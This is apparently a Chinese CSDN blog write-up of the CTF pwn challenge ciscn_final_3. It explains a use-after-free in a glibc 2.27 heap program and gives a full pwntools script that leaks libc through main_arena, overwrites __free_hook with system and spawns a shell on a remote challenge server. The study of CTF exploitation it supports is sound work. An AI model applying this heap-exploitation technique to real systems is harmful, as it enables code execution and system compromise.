ciscn_final_3

最新推荐文章于 2024-08-04 19:49:37 发布
最新推荐文章于 2024-08-04 19:49:37 发布
阅读量346 收藏 1
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105405141
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

ciscn_final_3

程序给的glibc版本为2.27,存在tcache机制

首先检查一下程序的保护机制

然后,我们用IDA分析一下

Delete功能存在UAF漏洞

程序没有show的功能,但是add时,会显示堆的地址。

为了能够泄露出glibc地址,我们就要依靠这个add时打印的堆地址。我们只要让tcache bin和unsorted bin重合,那么就能通过申请,把堆申请到main_arena处,打印堆地址时,返回的就是main_arena的地址。由于glibc版本为2.27,因此很容易利用,要得到unsorted bin范围的chunk,我们只需要篡改chunk的头部,然后多次free。

#coding:utf8
from pwn import *

#sh = process('./ciscn_final_3')
sh = remote('node3.buuoj.cn',29193)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
free_hook_s = libc.symbols['__free_hook']
malloc_hook_s = libc.symbols['__malloc_hook']
system_s = libc.sym['system']

def add(index,size,content):
   sh.sendlineafter('choice >','1')
   sh.sendlineafter('input the index',str(index))
   sh.sendlineafter('input the size',str(size))
   sh.sendafter('now you can write something',content)
   sh.recvuntil('gift :')
   heap_addr = int(sh.recvuntil('\n',drop = True),16)
   return heap_addr

def delete(index):
   sh.sendlineafter('choice >','2')
   sh.sendlineafter('input the index',str(index))

#0
add(0,0x70,'a'*0x70) - 0x10
#1
heap_addr = add(1,0x70,'b'*0x70) - 0x10
for i in range(2,10):
   add(i,0x70,'c'*0x70)

#10
add(10,0x10,'e'*0x10)
print 'heap_addr=',hex(heap_addr)
#double free
#多弄几个,使得size最后不会变成负数
delete(0)
delete(0)
delete(0)
delete(0)
delete(0)
delete(0)

#修改tcache的next指针,同时,设置chunk1的prev_size域为chunk1本身的地址,这样,我们申请到chunk1的头部时,next指针就对应了prev_size域
#由此继续形成了循环链表
add(11,0x78,p64(heap_addr) + 'a'*0x68 + p64(heap_addr + 0x10))
add(12,0x70,'a'*0x70)

#修改chunk1的头信息,使得1~9的大小合并
add(13,0x70,p64(heap_addr) + p64(0x80*9 + 1))
#获得unsorted bin
delete(1)
add(14,0x70,'d')
#申请到main_arena里,从而获得libc地址
main_arena_xx = add(15,0x70,'e')
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
system_addr = libc_base + system_s
print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)
print 'system_addr=',hex(system_addr)
#double free
delete(0)
delete(0)
add(16,0x70,p64(free_hook_addr))
add(17,0x70,'/bin/sh\x00')
#写free_hook
add(18,0x70,p64(system_addr))
#getshell
delete(17)

sh.interactive()

 

ha1vk
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
full_stack_final.zip
08-16
3. **README**:详细说明项目的构建、运行和测试方法,以及可能遇到的问题和解决方案。 4. **文档**:关于全栈开发的理论知识、最佳实践和学习资源的PDF或Markdown文件。 5. **示例**:针对特定技术或概念的示例代码...
mobilenet0.25_Final.zip
03-16
3. **Resolution Multiplier**:除了宽度乘积,MobileNet还可以通过调整输入图像的分辨率来控制模型的复杂度,更高的分辨率通常可以带来更好的识别性能。 4. **Feature Map Reduction**:在某些层,MobileNet会使用...
ciscn_2019_final_3
、moddemod
07-08 643
tcache机制的利用,通过unsorted泄露进而将堆空间开辟到libc中,写__free_hook拿到shell… exp from pwn import * context.log_level = 'debug' def pause_debug(): log.info(proc.pidof(p)) pause() def add(idx, size, content): p.sendlineafter('choice >', str(1)) p.sendl.
ciscn_2019_final_2
z1r0的博客
02-10 470
ciscn_2019_final_2 查看保护 在delete这里的话有两个uaf。还开了沙盒,说实话一开始真没什么思路,看了一下ha1vk的wp才知道漏了一init里面的一个非常重要的东西 这里读flag。flag的文件描述符被设置成了666 泄露数据的话也不是很多。几个字节 攻击思路:因为是2.27下,double free泄露出堆的低位地址,利用double free将size改为0x91,这个时候可以tcache attack泄露出main_arena的低位。 libc的这些低位都有了之后接
[BUUCTF]-PWN:ciscn_2019_final_3解析(tcache dup)
2301_79326813的博客
02-15 420
查看保护RELRO保护为FULL,got表不可修改,只能修改hook表了查看ida这里的大致功能为alloc创建堆块(可填充内容)、free释放堆块(但是不清空指针)值得注意的就是创建堆块大小不可以超过0x78(实际大小会对齐)
[Buuoj刷题]ciscn_2019_final_3 tcache attack
zylxixixi的博客
10-09 311
Tcache机制的引入 libc2.26以后引入了一个新的机制tcache,类似于fastbin,每条链上允许有7个chunk,多出的chunk会直接放入相应的fastbin或者Unsortedbin,跟以往不同的是,当用户申请chunk时,会优先寻找tcache中的chunk。 因为该机制的引入,提升了处理的速度,但安全性减低了,例如fastbin attach中的double free(tcache dup),free的时候会检查第一个chunk是否为自己,绕过该机制需要构造a->b->
buuoj刷题记录 - ciscn_2019_final_3
qq_34010404的博客
03-25 421
看了大佬们的思路才做出来的,这里只记录一下做题中踩的坑。 1.add函数 2.del函数 free后没有把数组元素标记为0,存在UAF漏洞. 思路是:1.double free 改fd 到 另一个chunk 的首地址处,然后修改chunksize ,原因是程序限制了分配大小为120字节,free到unsorted bin里面。 2.free chunk 到unsorted bin里面 3.double free 修改fd 到第二步中的chunk,之后便可以malloc 到unsorted bin处,然后
【buu刷题】ciscn_2019_final_3
m0_73756460的博客
03-18 349
【buu刷题】ciscn_2019_final_3 write up
ciscn_final_3 writeup
SkYe's Blog
10-24 307
基本情况 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled C++程序。只有两个功能,新建、释放堆块。数量上限为:24,大小限制为:0x78 。用列表维护,释放操作基于下标定位指针。 新建完成后会输出堆 fd 内存地址。 漏洞 free 没指令指针,造成 UAF : unsigned __int64 my_free() { __
[BUUCTF]PWN——ciscn_2019_final_3(tcache dup)
mcmuyanga的博客
03-10 1004
ciscn_2019_final_3 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,提示是堆题 64位ida载入 add() remove() 简单的思路:先合并堆块,合并后的堆块大于tcache的范围,然后free掉即可出现libc,接下来就是堆块重叠malloc一个堆块到libc空间,通过gift得到libc地址,接着tcache attack修改__free_hook拿到shell tcache 第一次接触tcache,根据ctfwiki上的知识点简单总结一
ciscn_final_5
seaaseesa的博客
04-09 421
ciscn_final_5 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 程序将下标存储到了堆地址的低4位里 操作的时候再清除低4位地址值。 问题就在于当index为16的时候,低4位已经无法表示了,这就造成了溢出 假如我的堆地址为0x10,我的index为16,那么,经过运算,保存的地址为0x20,这样free的时候,就是free(0x20)。因此,我...
lesson_test_calculator_final.rar_Final Test
09-19
标题 "lesson_test_calculator_final.rar_Final Test" 暗示我们正在处理一个关于软件开发的项目,特别是针对Symbian V3操作系统的一个最终测试版本。这个简易计算器是使用QT4框架在该平台上构建的,目的是作为新手...
FINAL_OFDM_FINAL_OFDM_
10-01
FINAL_OFDMOFDM(Orthogonal Frequency Division Multiplexing)即正交频分复用技术,实际上OFDM是MCM(Multi Carrier Modulation),多载波调制的一种。通过频分复用实现高速串行数据的并行传输
detection_Resnet50_Final.pth, Resnet50_Final.pth
03-16
3. **.pth文件**:在深度学习中,.pth扩展名通常用于存储PyTorch框架的权重和模型参数。这些文件包含了模型在训练过程中的学习结果,加载.pth文件可以快速恢复模型到训练时的状态,以便进行预测或者进一步的训练。 ...
云计算第二阶段:----监控与服务安全SECURITY
qq_53738093的博客
08-04 852
对服务的管理,不能仅限于可用性。还需要服务可以安全、稳定、高效地运行。监控的目的:早发现、早治疗。公开数据:对外开放的,不需要认证即可获取的数据私有数据:对外不开放,需要认证、权限才能获得的数据。
供应链安全:黑客攻击 Nimble 包
最新发布
weixin_47075747的博客
08-04 541
在软件开发领域,包管理器对于管理依赖项和简化开发过程至关重要。但是,这些工具并非对漏洞免疫。今天,我们将深入研究一个有趣的案例研究,了解我如何利用 Nimble 包管理器的漏洞来接管包并可能危害系统。系好安全带;这将是一次技术之旅。
Yarn:一个快速、可靠且安全的JavaScript包管理工具
来自计科大一萌新的编程记录本
08-04 707
学习目标:了解yarn的安装与配置
Android网络安全:如何防止中间人攻击
陆业聪
08-04 362
本文介绍了在Android开发中预防中间人攻击的方法,包括使用HTTPS加密通信、实施证书锁定、遵循SSL/TLS最佳实践和验证服务器主机名。这些措施有助于保护用户数据安全,提高应用程序安全性。
hwindow_final
11-29
hwindow_final是一个通过改进窗户设计来提高建筑能效的项目。该项目旨在利用智能技术和可持续材料来创造更加节能和环保的窗户系统。hwindow_final项目的关键特点包括高效的隔热和隔音性能、自动调节的智能控制系统、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值